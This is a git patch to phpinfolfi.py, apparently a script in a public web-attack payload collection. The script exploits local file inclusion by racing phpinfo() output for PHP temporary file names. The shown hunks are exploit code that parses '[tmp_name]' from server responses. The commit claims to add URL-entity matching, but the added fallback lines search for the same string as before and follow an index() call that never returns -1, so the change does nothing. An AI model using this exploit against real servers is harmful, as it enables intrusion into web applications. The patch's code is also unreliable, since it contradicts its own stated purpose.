From 7f1823efbe7aecfdd42ba2d41649bc1f632dfd9c Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 10 Oct 2023 13:56:57 +0200 Subject: [PATCH] Fix character matching for '>' and its URL entity encoding from @CaoZnZZ --- File Inclusion/Files/phpinfolfi.py | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/File Inclusion/Files/phpinfolfi.py b/File Inclusion/Files/phpinfolfi.py index c369232..d2a9360 100644 --- a/File Inclusion/Files/phpinfolfi.py +++ b/File Inclusion/Files/phpinfolfi.py @@ -53,6 +53,8 @@ def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag): d += s.recv(offset) try: i = d.index("[tmp_name] =>") + if i == -1: + i = d.index("[tmp_name] =>") fn = d[i+17:i+31] except ValueError: return None @@ -111,6 +113,8 @@ def getOffset(host, port, phpinforeq): break s.close() i = d.find("[tmp_name] =>") + if i == -1: + i = d.find("[tmp_name] =>") if i == -1: raise ValueError("No php tmp_name in phpinfo output") @@ -193,4 +197,4 @@ def main(): if __name__=="__main__": print("Don't forget to modify the LFI URL") - main() + main() \ No newline at end of file